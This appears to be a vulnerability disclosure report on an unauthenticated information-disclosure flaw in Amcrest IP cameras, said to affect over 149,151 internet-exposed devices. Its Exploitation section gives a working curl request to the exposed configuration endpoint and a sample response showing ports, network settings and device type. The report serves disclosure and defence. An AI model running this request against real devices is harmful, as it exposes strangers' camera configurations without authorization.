Overview

This report highlights an Information Disclosure vulnerability in multiple AMCREST IPC devices. The vulnerability is demonstrated by a lack of proper access control, allowing sensitive configuration data to be accessed through an unauthenticated HTTP request, affecting over 149,151 devices on the Internet.

image.png

Affected Devices

CWE

CWE-200: Information Exposure

Affected Component

URI: http://[IP_address]/web_caps/webCapsConfig

Description: this endpoint returns detailed device information, including the device type, vendor, network configuration (IP addresses and port mappings), system capabilities, and software/plugin versions.

Exploitation

curl -X GET "http://[IP_address]/web_caps/webCapsConfig" -H "Accept: */*"

HTTP response example:

{
  "Anonymous": false,
  "HttpPort": {
     "InnerPort": 80,
     "OuterPort": 8080
  },
  "HttpsPort": {
     "InnerPort": 443,
     "OuterPort": 443
  },
  "RTSPPort": {
     "InnerPort": 554
  },
  "deviceType": "IP2M-841W",
  "eth0": {
     "IPAddress": "",
     "IPv6Address": ""
  },
  "eth2": {
     "IPAddress": "",
     "IPv6Address": ""
  },
  "vendor": "Amcrest",
  ...
}